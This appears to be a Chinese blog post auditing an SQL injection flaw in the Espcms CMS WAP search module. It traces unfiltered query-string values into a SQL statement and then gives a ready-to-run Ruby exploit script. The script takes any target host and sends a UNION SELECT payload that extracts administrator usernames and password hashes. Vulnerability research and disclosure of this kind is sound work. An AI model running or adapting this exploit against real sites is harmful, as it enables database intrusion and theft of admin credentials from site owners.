代码审计：Espcms wap模块SQL注入漏洞及利用EXP |

发表评论
847 次浏览

A+

显示不全请点击全屏阅读

变量的传递过程是$_SERVER[‘QUERY_STRING’]->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。

正因为变量是从$_SERVER[‘QUERY_STRING’]中去取的，所以正好避开了程序的过滤。

而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。

在/interface/3gwap_search.php文件的in_result函数中:

function in_result() {

            ... ... ... ... ... ... ... ... ...

            //从$_SERVER['QUERY_STRING']中获取数据

            $urlcode = $_SERVER[ 'QUERY_STRING '];

            parse_str(html_entity_decode($urlcode), $output);

            ... ... ... ... ... ... ... ... ...

            if (is_array($output['attr' ]) && count($output['attr']) > 0) {

                  $db_table = db_prefix . 'model_att';

                   foreach ($output['attr' ] as $key => $value) {

                         if ($value) {

                              //对key过滤，忽略了value

                              $key = addslashes($key);

                              $key = $this-> fun->inputcodetrim($key);

                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";

                              //要求此处$countnum>0

                              $countnum = $this->db_numrows($db_table, $db_att_where);

                               if ($countnum > 0) {

                                    //value被拼接进入SQL语句

                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;

                              }

                        }

                  }

            }

            if (!empty ($keyword) && empty($keyname)) {

                  $keyname = 'title';

                  $db_where.= " AND a.title like '%$keyword%'" ;

            } elseif (!empty ($keyword) && !empty($keyname)) {

                  $db_where.= " AND $keyname like '% $keyword%'";

            }

            $pagemax = 15;

            $pagesylte = 1;

             if ($countnum > 0) {

                  $numpage = ceil($countnum / $pagemax);

            } else {

                  $numpage = 1;

            }

            //拼接进入SQL语句

            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;

            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);

            $sql = $this-> htmlpage->PageSQL('a.did' , 'down' );

            //被执行

            $rs = $this->db->query($sql);

            ... ... ... ... ... ... ... ... ...

      }

因此若传入数组且key经过构造的话，可以达到SQL注入的目的

PoC：

require "net/http"

require "uri"

def request(method, url)

    if method.eql?("get")

        uri = URI.parse(url)

        http = Net::HTTP.new(uri.host, uri.port)

        response = http.request(Net::HTTP::Get.new(uri.request_uri))

        return response

    end

end

doc =<<HERE

-------------------------------------------------------

Espcms Inejction Exploit

Author:ztz

Blog:http://ztz.fuzzexp.org/

-------------------------------------------------------

HERE

usage =<<HERE

Usage:      ruby #{$0} host port path

example:    ruby #{$0} www.target.com 80 /

HERE

puts doc

if ARGV.length < 3

    puts usage

else

    $host = ARGV[0]

    $port = ARGV[1]

    $path = ARGV[2]

    puts "[*]send request..."

    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"

    response = request("get", url)

    result = response.body.scan(/\w+&\w{32}/)

    puts result

end

作者：0day

Tags：

espcms漏洞, 代码审计,

如果您喜欢我的博客，欢迎点击图片定订阅到邮箱也可以点击链接【订阅到鲜果】